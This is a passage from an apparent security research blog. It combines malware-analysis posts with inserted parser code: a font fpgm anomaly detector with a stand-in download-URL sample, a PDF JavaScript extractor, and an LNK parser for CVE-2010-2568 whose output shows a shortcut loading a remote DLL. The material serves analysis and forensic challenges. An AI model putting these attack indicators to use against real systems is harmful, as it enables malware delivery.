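PUSHW0, PUSHW7 = 0xB8, 0xBF          # PUSHW[n]: 2*(n+1) bytes follow
FDEF, ENDF = 0x2C, 0x2D              # function definition start / end


def build_ttf(tables: Dict[bytes, bytes]) -> bytes:
    """Assemble a minimal sfnt container from {tag: payload} (constructed test data)."""
    n = len(tables)
    header = struct.pack(">IHHHH", 0x00010000, n, 0, 0, 0)  # version 1.0, numTables
    offset = 12 + 16 * n
    directory, body = b"", b""
    for tag, payload in tables.items():
        directory += struct.pack(">4sIII", tag, 0, offset, len(payload))
        padded = payload + b"\0" * (-len(payload) % 4)      # tables are 4-byte aligned
        body += padded
        offset += len(padded)
    return header + directory + body


def parse_table_directory(data: bytes) -> Dict[str, Tuple[int, int]]:
    """Return {tag: (offset, length)} for every table record in the font."""
    if len(data) < 12:
        raise ValueError("too short for an sfnt header")
    version, num_tables = struct.unpack(">IH", data[:6])
    if version not in (0x00010000, 0x74727565):             # 1.0 or 'true'
        raise ValueError("not a TrueType sfnt header")
    tables = {}
    for i in range(num_tables):
        rec = data[12 + 16 * i: 28 + 16 * i]
        if len(rec) < 16:
            raise ValueError("truncated table directory")
        tag, _checksum, offset, length = struct.unpack(">4sIII", rec)
        if offset + length > len(data):
            raise ValueError(f"table {tag!r} runs past end of file")
        tables[tag.decode("latin-1")] = (offset, length)
    return tables


def walk_fpgm(prog: bytes) -> Tuple[int, int, int]:
    """Walk the instruction stream and return (FDEF count, ENDF count,
    instructions executed outside any FDEF/ENDF block). PUSH payloads are
    skipped so their data bytes are not mistaken for opcodes."""
    i, depth = 0, 0
    fdef = endf = outside = 0
    while i < len(prog):
        op = prog[i]
        i += 1
        if op == NPUSHB and i < len(prog):
            i += 1 + prog[i]
        elif op == NPUSHW and i < len(prog):
            i += 1 + 2 * prog[i]
        elif PUSHB0 <= op <= PUSHB7:
            i += op - PUSHB0 + 1
        elif PUSHW0 <= op <= PUSHW7:
            i += 2 * (op - PUSHW0 + 1)
        elif op == FDEF:
            fdef += 1
            depth += 1
        elif op == ENDF:
            endf += 1
            depth = max(depth - 1, 0)
        elif depth == 0:
            outside += 1
    return fdef, endf, outside


def assess_fpgm(data: bytes, max_len: int = 4096) -> List[str]:
    """Heuristic findings for the fpgm table; an empty list means nothing odd."""
    tables = parse_table_directory(data)
    if "fpgm" not in tables:
        return []
    off, length = tables["fpgm"]
    prog = data[off:off + length]
    findings = []
    if length > max_len:                                    # threshold is an assumption
        findings.append(f"fpgm is {length} bytes, unusually large")
    fdef, endf, outside = walk_fpgm(prog)
    if fdef != endf:
        findings.append(f"unbalanced FDEF/ENDF ({fdef}/{endf})")
    if outside:
        findings.append(f"{outside} instructions outside any FDEF/ENDF block")
    for url in re.findall(rb"https?://[\x21-\x7e]{4,}", prog):
        findings.append(f"embedded URL-like string: {url.decode('ascii')}")
    return findings


# Constructed samples: a benign fpgm (PUSHB[0] 0; FDEF; MPPEM; ENDF) and a
# stand-in for a hijacked one (filler bytes plus a download URL), not real shellcode.
LEGIT_FPGM = bytes([PUSHB0, 0x00, FDEF, 0x4B, ENDF])
SUSPECT_FPGM = b"\x90" * 16 + b"http://example.invalid/stage2"
LEGIT_TTF = build_ttf({b"cmap": b"\0" * 8, b"fpgm": LEGIT_FPGM})
SUSPECT_TTF = build_ttf({b"cmap": b"\0" * 8, b"fpgm": SUSPECT_FPGM})

if __name__ == "__main__":
    for name, font in (("legit", LEGIT_TTF), ("suspect", SUSPECT_TTF)):
        print(name, assess_fpgm(font) or ["no findings"])
```

On a real file, read the font with `open(path, "rb").read()` and pass it to `assess_fpgm`; the same directory parser also gives the offsets needed to carve the table out for a closer look in a hex editor.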
<br />
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Forensic Challenge 9 - "Mobile Malware" (yomuds, 2011-08-04)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<span style="font-family: inherit;">We did it again: this time we published a new challenge on mobile malware. This was a really awesome challenge for us to work on, since we worked with different chapters. This time, Azizan and I teamed up with <span style="background-color: white; line-height: 20px;">Franck Guenichot from the French Chapter and Matt Erasmus from the South Africa Chapter.</span></span></div>
<div style="text-align: justify;">
<span style="background-color: white; line-height: 20px;"><span style="font-family: inherit;"><br /></span></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="line-height: 20px;">Enjoy the challenge! :)</span></span></div>
<br />
<br />
Here is the description of the challenge posted by the Honeynet Project:<br />
<br />
<br />
<h2 style="background-color: white; color: #494949; font-family: Helvetica, Arial, sans-serif; font-size: 19px; font-weight: normal; line-height: 24px; margin: 0px; padding: 0px;">
Forensic Challenge 9 - "Mobile Malware"</h2>
<div class="node" id="node-751" style="background-color: white; border-bottom-color: rgb(248, 247, 237); border-bottom-style: solid; border-bottom-width: 1px; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px; margin: -1.5em -26px 1.5em; padding: 1.5em 26px;">
<div class="content" style="margin: 0.6em 0px;">
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<strong>Challenge 9 - Mobile Malware</strong> (provided by Franck Guenichot from French Chapter, Mahmud Ab Rahman and Ahmad Azizan Idris from Malaysia Chapter and Matt Erasmus from South Africa Chapter)</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
Please submit your solution using the submission template below by September 30th 2011 at <a href="http://www.honeynet.org/challenge2010" style="color: #00a3db; text-decoration: initial;">http://www.honeynet.org/challenge2010</a>.</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
Results will be announced mid October. For any questions and inquiries, please contact forensicchallenge2010@honeynet.org.</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<strong>Skill Level: Intermediate</strong></div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
With the number of smartphone users growing exponentially (1.6 billion mobile device units sold in 2010, 19% were smartphones), mobile devices are becoming an attractive platform for cybercriminals. As a security researcher or enthusiast, you need to know your enemy and be able to defend yourself against these new kinds of threats.</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
This challenge offers the exploration of a real smartphone, based on a popular OS, after a security incident.<br />You will have to analyze the image of a portion of the file system, extract all that may look suspicious, analyze the threat and finally submit your forensic analysis. From file system recovery to malware reverse engineering and PCAP analysis, this challenge will take you into the world of mobile malware.</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<strong>Questions: </strong><br />1. Write an executive summary of this incident (3 pts)<br />2. Provide the phone brand, model, OS name and version (1 pt)<br />3. Extract any suspicious application (if any). Detail your extraction method. Please provide the name and SHA1 for each suspicious app. (4 pts)<br />4. What permissions are requested by the malware(s)? Why is it suspicious? (1 pt)<br />5. Please provide a solution/s to quickly identify any suspicious API (please define your suspicious API according to your understanding) (8 pts)<br />6. What is the malware's home server URL and where is it located? Where, in the code, is/are the command server(s) URL(s) stored? (4 pts)<br />7. What can you say about the communications model between the malware and its C&C server? (2 pts)<br />8. If encryption was used for the communication, which encryption algorithm was used? What was the key used? Explain how you found it. (4 pts)<br />9. Please draw a graph of the decrypted communication flow, found in the pcap, between the malware and the C&C (4 pts)<br />10. What personal information was leaked during this incident? A special *secret* piece of information was leaked; explain how and what it was. (2 pts)<br />11. What particular techniques are used by the malware to harden analysis or to evade detection? What unusual behavior can be noticed? (6 pts)<br />12. Provide a detailed analysis of the malware behavior and features. (10 pts)<br />13. Please provide a method to block (or request permission from Android (similar to the UAC concept)) when any suspicious call is received from Android (8 pts)</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<strong>Download:</strong></div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<a href="http://malphx.free.fr/dotclear/public/fc9files-final.tar.gz" style="color: #00a3db; text-decoration: initial;">fc9files-final.tar.gz</a><br />SHA1: dbc378ce1807a4a2459f882b13b4224d0db8fbc7</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
The archive contains 2 files:<br />- data.bin: corrupted /data partition image of the phone<br />- traffic.pcap: traffic capture of the malware communications.</div>
<div style="margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
This work by Franck Guenichot, Mahmud Ab Rahman, Ahmad Azizan Idris and Matt Erasmus is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.</div>
</div>
</div>
</div>
Sneaky PDF will be featured at DEFCON 19 (yomuds, 2011-06-18)<div dir="ltr" style="text-align: left;" trbidi="on">
\o/ My paper on Sneaky PDF has been accepted for DEFCON 19. I'll present how in-the-wild malicious PDFs implement obfuscation to avoid detection and make analysis harder. Here is my full abstract:<br />
<br />
<br />
<br />
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace; font-size: large;">Sneaky PDF</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">Being the most prevalent document exchange format on the Internet, Portable Document Format (PDF) is in danger of becoming the main target for client-side attacks. With an estimated more than 1.5 million lines of code and loaded with a huge amount of functionality, this powerful document format suffers from several high-impact vulnerabilities, allowing attackers to exploit it and use it as a malware spreading vector.</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">Until now, thousands of malicious PDF files have spread with little chance of being detected.</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">The challenges are the obfuscation techniques used by attackers to hide their malicious activities, hence minimizing the detection rate. In order to sustain the survival of malicious PDF files on the Internet, attackers circumvent the analysis process through diverse obfuscation techniques. The obfuscation methods used usually range from PDF syntax obfuscation and PDF filtering mechanisms to JavaScript obfuscation and variants combining both. Because of rapid changes in obfuscation methods, most antivirus software as well as security tools fail to detect malicious content inside PDF files, thus increasing the number of victims of malicious PDF mischief.</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">In this paper, we study the obfuscation techniques used inside in-the-wild malicious PDFs, how to make them stealthier, and how we can improve the analysis of malicious PDFs.</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Times, Times New Roman, serif;">I'm looking forward to meeting old and new faces! It will be my first time at DEFCON. :)</span></div>
</div>
Reversing Android Malware And Honeynet Project Workshop (yomuds, 2011-03-27)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I am honored that the Honeynet Project folks allowed me to present on a new topic, "Reverse Engineering Android Malware", at the Honeynet Project Security Workshop in Paris, France last week. The first part of my presentation covered, in detail, an introduction to APK, Dalvik and the processes involved in Android app development through to packaging. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For the second part of the presentation, I focused on methods and tools for reversing Android malware or apps. When reverse engineering an Android app (or malware), the ideal goal is to obtain decompiled code in Java (normally), but unfortunately decompiling is hard! :). So an understanding of disassembled Dalvik code is a good skill to have when doing reverse engineering on the Android platform.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The third part of the presentation is a few case studies on various Android malware. The malware samples are SMS.Trojan, Geinimi, ADDR and DreamDroid. These are quite interesting samples. I sorted the case study samples from simple to intermediate level of complexity. On Geinimi and DreamDroid, I demoed how we can reverse engineer the cryptography implemented within the malware samples. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The Honeynet Project has already released my presentation slides. You can get them from <a href="http://www.honeynet.org/files/HPW2011%20-%20Reversing%20Android%20Malware%20-%20Mahmud%20Ab%20Rahman.pdf" target="_blank">here</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
&lt;update&gt; </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The video for my presentation is published.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
#The First Part of the Presentation</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/8PS47XNwntg?feature=player_embedded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
#The Second Part of The Presentation</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://3.gvt0.com/vi/AnP_apJlm68/0.jpg" height="266" width="320"><param name="movie" value="http://www.youtube.com/v/AnP_apJlm68&fs=1&source=uds" /><param name="bgcolor" value="#FFFFFF" /><param name="allowFullScreen" value="true" /><embed width="320" height="266" src="http://www.youtube.com/v/AnP_apJlm68&fs=1&source=uds" type="application/x-shockwave-flash" allowfullscreen="true"></embed></object></div>
<div style="text-align: justify;">
<br /></div>
</div>
Honeynet Project Forensic Challenge on Malicious PDF (yomuds, 2010-11-01)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
Ahmad Azizan and I released a challenge for the Honeynet Project Forensic Challenge on our favorite topic, malicious PDF, called "<strong style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px;"><a href="http://www.honeynet.org/challenges/2010_6_malicious_pdf" style="color: #0083b0;">Analyzing Malicious Portable Destructive Files</a>".</strong> We implemented a few tricks to make analysis harder inside the PDF file, such as JavaScript obfuscation, the PDF /Root component, PDF syntax obfuscation and many more. It will be interesting to see how people end up with the wrong shellcode execution. >;). Good luck and enjoy the challenge. We definitely had a lot of fun while working on it.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Please check out the challenge from Honeynet Project Forensic Challenge 6 page <a href="http://www.honeynet.org/challenges/2010_6_malicious_pdf" target="_blank">here</a>.</div>
<br />
<br />
Here is the challenge description:<br />
<br />
<br />
<div style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px; margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
<strong>The Challenge:</strong></div>
<div style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px; margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
The PDF format is the de facto standard for exchanging documents online. Such popularity, however, has also attracted cyber criminals to use it for spreading malware to unsuspecting users. The ability to generate malicious PDF files to distribute malware is functionality that has been built into many exploit kits. As users are less cautious about opening PDF files, the malicious PDF file has become quite a successful attack vector.<br />
<br />
The network traffic captured in lala.pcap contains network traffic related to a typical malicious PDF file attack, in which an unsuspecting user opens a compromised web page, which redirects the user's web browser to the URL of a malicious PDF file. As the PDF plug-in of the browser opens the PDF, the unpatched version of Adobe Acrobat Reader is exploited and, as a result, downloads and silently installs malware on the user's machine.</div>
<ol style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px;">
<li>How many URL path(s) are involved in this incident? Please list down the URL path(s) found. (1pt)</li>
<li>What code can you find inside the PCAP file? Explain what the code does. (2pts)</li>
<li>What file(s) can you find within the PCAP file? If any files are found, please zip compress them into a password protected file (password infected) with file name: [your email]_Forensic Challenge 2010 – Challenge 6 – Extracted Files.zip and submit to <a href="http://www.honeynet.org/challenge2010/" style="color: #00a3db; text-decoration: initial;" title="http://www.honeynet.org/challenge2010/">http://www.honeynet.org/challenge2010/</a>. (3pts)</li>
<li>How many object(s) are contained inside the PDF file? (1pt)</li>
<li>Using PDF dictionary and object referencing, explain in detail the flow structure of a PDF file. (1pt)</li>
<li>How many filtering schemes are used for the object streams and what are they? Explain how you can decompress the stream. (1pt)</li>
<li>Which object streams might contain malicious content? List the object and explain the obfuscation technique(s) used. (3pts)</li>
<li>What exploit(s) are contained inside the PDF file? Which one that actually runs and triggers the vulnerability(ies)? Please provide some explanation for your answer. (4pts)</li>
<li>Are there any payloads inside the PDF file? If any, list them all and explain what they do. Which payload will be executed? (2pts)</li>
<li>With the understanding of the PDF format structure, please explain how we can enable other exploits to run when the PDF file is opened. (2pts)</li>
</ol>
<div style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px; margin-bottom: 1.2em; margin-top: 0.6em; padding: 0px;">
Bonus:</div>
<ol style="background-color: white; color: #494949; font-family: Verdana; font-size: 12px; line-height: 20px;">
<li>Please provide the dot graph of the PDF object’s connectivity inside the PDF file. (1pt)</li>
<li>Please provide an automated solution to extract and analyze JavaScript code within the PDF file. Be creative! (Describe your solution below, but submit any source code and executable in a compressed zip file with file name [your email]_Forensic Challenge 2010 – Challenge 6 – Bonus2.zip via our submission form <a href="http://www.honeynet.org/challenge2010/" style="color: #00a3db; text-decoration: initial;" title="http://www.honeynet.org/challenge2010/">http://www.honeynet.org/challenge2010/</a>.) (1pt)</li>
</ol>
<div>
<span style="color: #494949; font-family: Verdana;"><span style="font-size: 12px; line-height: 20px;">To get started, you need to inspect a PCAP file. It can be downloaded from this <a href="http://www.honeynet.org/files/lala.pcap" target="_blank">page</a>. </span></span></div>
<div>
<span style="color: #494949; font-family: Verdana;"><span style="font-size: 12px; line-height: 20px;"><br /></span></span></div>
<div>
<span style="color: #494949; font-family: Verdana;"><span style="font-size: 12px; line-height: 20px;"><br /></span></span></div>
</div>
Malicious PDF Technical Analysis Write Up (yomuds, 2010-08-25)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
For 2010, I spent a bit of my time poking at malicious PDF analysis. I came up with a technical write-up on analyzing malicious PDFs. The title of the write-up is "Getting Owned by Malicious PDF". I split the write-up into multiple samples, sorted from easy to moderate in terms of the challenges and obstacles encountered when analyzing malicious PDFs.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It starts with an introduction to PDF structures and components. The next section is on analyzing a vanilla PDF which only has a plain and flat PDF structure. This is a good introduction to familiarize the audience with the PDF structure and also to expose them to the malicious PDF threat. In this sample, the analysis focuses on understanding PDF internals and extracting interesting components such as the /Root object, JavaScript code and shellcode (within the JavaScript code).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The second sample involves compressed PDF components that make use of the PDF /Filter feature. /Filter allows any PDF object to be compressed or encoded using compression algorithms and encoding methods, such as zlib compression for the /FlateDecode filter and ASCII-to-hex for the /ASCIIHexDecode filter. There are many methods that can be implemented; please refer to the PDF specification by Adobe.</div>
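As an added example (not code from the write-up), a small Ruby decoder for the /Filter chain from sample 2 and the /Root and JavaScript extraction from sample 1: it walks the objects, applies /ASCIIHexDecode and /FlateDecode in the listed order, finds the /Root reference and pulls out the script behind a /S /JavaScript action. The sample PDF is constructed inline and is not malicious; object streams, xref streams and string escapes are out of scope for this toy parser.

```ruby
require 'zlib'

# Apply the decoders named in /Filter, in the listed order, which is the
# order a PDF reader decodes them. Unknown filters raise rather than being
# silently skipped, so an analyst notices an unsupported encoding.
def apply_filters(filters, data)
  filters.reduce(data) do |buf, filter|
    case filter
    when 'ASCIIHexDecode'
      hex = buf.split('>', 2).first.to_s.gsub(/\s+/, '')  # '>' is the EOD marker
      hex += '0' if hex.length.odd?                        # odd final digit is padded with 0
      [hex].pack('H*')
    when 'FlateDecode'
      Zlib::Inflate.inflate(buf)
    else
      raise "unsupported filter /#{filter}"
    end
  end
end

# Return { object_number => { dict:, stream: } } for every "N G obj ... endobj".
def parse_objects(pdf)
  objects = {}
  pdf.scan(/(\d+)\s+\d+\s+obj(.*?)endobj/m) do |num, body|
    stream = body[/stream\r?\n(.*?)\r?\nendstream/m, 1]
    dict = body.sub(/stream\r?\n.*\z/m, '')
    objects[num.to_i] = { dict: dict, stream: stream }
  end
  objects
end

# Filter names from a dictionary: "/Filter /FlateDecode" or "/Filter [/A /B]".
def filters_of(dict)
  spec = dict[%r{/Filter\s*(\[[^\]]*\]|/\w+)}, 1]
  spec ? spec.scan(%r{/(\w+)}).flatten : []
end

# Decoded contents of the stream belonging to object `num` (nil if none).
def decoded_stream(objects, num)
  obj = objects[num]
  return nil unless obj && obj[:stream]
  apply_filters(filters_of(obj[:dict]), obj[:stream])
end

# Collect the script of every /S /JavaScript action, resolving /JS whether
# it is an inline literal string or an indirect reference to a stream.
def extract_javascript(pdf)
  objects = parse_objects(pdf)
  objects.values.each_with_object([]) do |obj, scripts|
    next unless obj[:dict] =~ %r{/S\s*/JavaScript}
    js = if (ref = obj[:dict][%r{/JS\s+(\d+)\s+\d+\s+R}, 1])
           decoded_stream(objects, ref.to_i)
         else
           obj[:dict][%r{/JS\s*\((.*?)\)}m, 1]   # literal string; escapes are not unescaped here
         end
    scripts << js if js
  end
end

# The catalog (/Root) reference from the trailer.
def root_object(pdf)
  ref = pdf[%r{/Root\s+(\d+)\s+\d+\s+R}, 1]
  ref && ref.to_i
end

# Constructed sample: the catalog's /OpenAction is a JavaScript action whose
# script lives in a stream that was deflated and then hex-encoded, so the
# /Filter array lists /ASCIIHexDecode first and /FlateDecode second.
def build_sample_pdf
  js = "app.alert('constructed sample');"
  hexed = Zlib::Deflate.deflate(js).unpack1('H*').upcase + '>'
  <<~PDF
    %PDF-1.4
    1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
    2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
    3 0 obj << /Type /Page /Parent 2 0 R >> endobj
    4 0 obj << /S /JavaScript /JS 5 0 R >> endobj
    5 0 obj << /Length #{hexed.bytesize} /Filter [/ASCIIHexDecode /FlateDecode] >>
    stream
    #{hexed}
    endstream
    endobj
    trailer << /Root 1 0 R >>
  PDF
end

if __FILE__ == $PROGRAM_NAME
  pdf = build_sample_pdf
  puts "Root object: #{root_object(pdf)}"
  extract_javascript(pdf).each { |js| puts "JavaScript: #{js}" }
end
```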
<div style="text-align: left;">
</div>
<span style="color: #222222; font-family: arial, sans-serif; line-height: 16px;"><br /></span><span style="color: #222222; font-family: arial, sans-serif; line-height: 16px;">For the details on samples 3 and 4, please feel free to download and read the write-up from SANS's web page </span><a href="http://www.sans.org/reading_room/whitepapers/malicious/owned-malicious-pdf-analysis_33443" style="font-family: arial, sans-serif; line-height: 16px;" target="_blank">here</a><span style="color: #222222; font-family: arial, sans-serif; line-height: 16px;">.</span></div>
yomudshttp://www.blogger.com/profile/10660119780422829194noreply@blogger.com1tag:blogger.com,1999:blog-16641472.post-69260552038417467122010-07-27T03:08:00.000-07:002012-11-18T03:10:02.784-08:00LNK (Windows File Shortcut) Parser For CVE-2010-2568<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.microsoft.com/technet/security/advisory/2286198.mspx" target="_blank">CVE-2010-2568</a> needs an LNK file with a malicious DLL to cause harm. Feeling the urgency of parsing LNK files to trace any DLL present, I modified a small portion of the code from the Metasploit project to make it run independently of the Metasploit framework. The original code is <a href="http://www.metasploit.com/redmine/projects/framework/repository/entry/scripts/meterpreter/dumplinks.rb" target="_blank">here</a>. The main purpose of dumplinks.rb is to extract information from each LNK file.
The code was originally written by davehull. Here is the output of the modified code:<br />
<br />
<br />
<div style="background-color: #d5d6d7; color: #333333; font-family: 'Lucida Grande', Verdana, Arial, sans-serif; font-size: 12px; line-height: 16.78333282470703px; text-align: justify;">
<br /></div>
<pre lang="bash" style="background-color: #d5d6d7; color: #333333; line-height: 16.78333282470703px; text-align: justify;">[+]Processing: lalameta.lnk
[+]Found CLSID=00021401-0000-0000-C000-0000000000460
lalameta.lnk:
Access Time = Tue Jul 27 17:16:06 +0800 2010
Creation Date = Thu Jul 22 01:16:24 +0800 2010
Modification Time = Thu Jul 22 01:16:24 +0800 2010
Contents of lalameta.lnk:
Flags:
Attributes:
Target file's MAC Times stored in lnk file:
Creation Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Modification Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Access Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
ShowWnd value(s):
Target file's MAC Times stored in lnk file:
Creation Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Modification Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Access Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
[+]checking offset of 0x80 to find DLL from metasploit code generator
[+]:<strong>\\192.168.20.2\xyTxzY\CjmX.dll</strong>
</pre>
<div style="background-color: #d5d6d7; color: #333333; font-family: 'Lucida Grande', Verdana, Arial, sans-serif; font-size: 12px; line-height: 16.78333282470703px; text-align: justify;">
The text in bold shows the DLL that is loaded by the LNK file. Below is the result from the p0c provided by <a href="http://www.ivanlef0u.tuxfamily.org/?p=411" style="color: #b85b5a; text-decoration: initial;">ivanlef0u</a>.</div>
<pre lang="bash" style="background-color: #d5d6d7; color: #333333; line-height: 16.78333282470703px; text-align: justify;">[+]Processing: suckme.lnk_
129
suckme.lnk_:
Access Time = Tue Jul 27 17:52:02 +0800 2010
Creation Date = Mon Jul 19 10:32:26 +0800 2010
Modification Time = Sun Jul 18 00:37:30 +0800 2010
Contents of suckme.lnk_:
Flags:
Shell Item ID List exists.
Attributes:
Target file's MAC Times stored in lnk file:
Creation Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Modification Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Access Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
ShowWnd value(s):
SW_SHOW.
SW_NORMAL.
SW_SHOWMINNOACTIVE.
SW_SHOWMAXIMIZED.
SW_RESTORE.
Target file's MAC Times stored in lnk file:
Creation Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Modification Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
Access Time = Thu Jan 01 07:30:00 +0730 1970. (UTC)
[+]checking offset of 0x80 to find DLL from metasploit code
[+]: <strong>:C:\dll.dll</strong>Mises ? jour automatiquesCo</pre>
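As an added example (not the modified dumplinks.rb), a minimal Ruby parser for the shell link header and LinkTargetIDList that reports the flags, ShowCommand and MAC times and flags any UTF-16LE DLL path embedded in a shell item, which is the artefact an analyst looks for in a CVE-2010-2568 style shortcut. The sample LNK is constructed inline; its item is a generic container for a path, not a faithful copy of the control-panel item the exploit abuses, and the field layout follows the published MS-SHLLINK format.

```ruby
LNK_CLSID = '00021401-0000-0000-c000-000000000046'
LINK_FLAGS = {
  0x01 => 'HasLinkTargetIDList', 0x02 => 'HasLinkInfo', 0x04 => 'HasName',
  0x08 => 'HasRelativePath', 0x10 => 'HasWorkingDir', 0x20 => 'HasArguments',
  0x40 => 'HasIconLocation', 0x80 => 'IsUnicode'
}.freeze
SHOW_COMMANDS = { 1 => 'SW_SHOWNORMAL', 3 => 'SW_SHOWMAXIMIZED', 7 => 'SW_SHOWMINNOACTIVE' }.freeze
EPOCH_DIFF = 11_644_473_600 # seconds from 1601-01-01 to 1970-01-01
# HeaderSize, LinkCLSID, LinkFlags, FileAttributes, 3 x FILETIME, FileSize,
# IconIndex, ShowCommand, HotKey (10 reserved bytes follow, to 0x4C in total)
HEADER_FMT = 'Va16VVQ<Q<Q<VVVv'

# FILETIME (100 ns ticks since 1601) to UTC Time; zero means "not set".
# Converting zero blindly is what prints the 1970 epoch in the output above.
def filetime_to_time(ft)
  return nil if ft.zero?
  Time.at(ft / 10_000_000 - EPOCH_DIFF).utc
end

def guid_to_s(raw)
  d1, d2, d3, rest = raw.unpack('VvvH16')
  format('%08x-%04x-%04x-%s-%s', d1, d2, d3, rest[0, 4], rest[4, 12])
end

# Heuristic: UTF-16LE strings ending in ".dll" inside a shell item, tried at
# both byte alignments because the string need not start at an even offset.
def dll_paths_in(item)
  [item, item.byteslice(1, item.bytesize - 1)].flat_map do |aligned|
    next [] if aligned.nil? || aligned.bytesize < 2
    even = aligned.byteslice(0, aligned.bytesize & ~1)
    text = even.dup.force_encoding('UTF-16LE')
               .encode('UTF-8', invalid: :replace, undef: :replace, replace: ' ')
    text.scan(/[\w\\:.$~-]+\.dll/i)
  end.uniq
end

def parse_lnk(data)
  data = data.b
  raise 'too short for a shell link header' if data.bytesize < 0x4C
  size, clsid, flags, attrs, ctime, atime, wtime, fsize, _icon, show, _hotkey =
    data.unpack(HEADER_FMT)
  raise 'bad HeaderSize' unless size == 0x4C
  raise 'not a shell link CLSID' unless guid_to_s(clsid) == LNK_CLSID
  info = {
    flags: LINK_FLAGS.select { |bit, _| (flags & bit) != 0 }.values,
    attributes: attrs, file_size: fsize,
    creation: filetime_to_time(ctime), access: filetime_to_time(atime),
    write: filetime_to_time(wtime),
    show_command: SHOW_COMMANDS.fetch(show, format('0x%x', show)),
    id_list: [], dll_paths: []
  }
  if (flags & 0x01) != 0                          # HasLinkTargetIDList
    pos = 0x4C + 2                                # IDListSize does not count itself
    list_end = pos + data[0x4C, 2].unpack1('v')
    while pos + 2 <= list_end
      item_size = data[pos, 2].unpack1('v')
      break if item_size.zero?                    # TerminalID
      raise 'item runs past IDList' if pos + item_size > list_end
      item = data[pos + 2, item_size - 2]
      info[:id_list] << item
      info[:dll_paths].concat(dll_paths_in(item))
      pos += item_size
    end
  end
  info
end

# Constructed sample: valid header, HasLinkTargetIDList set, SW_SHOWNORMAL,
# a creation time, and one item carrying a UTF-16LE DLL path.
def build_sample_lnk(dll_path)
  path16 = dll_path.encode('UTF-16LE').b + "\x00\x00".b
  item = "\x1F".b + ("\x00" * 11).b + path16
  id_list = [item.bytesize + 2].pack('v') + item + "\x00\x00".b
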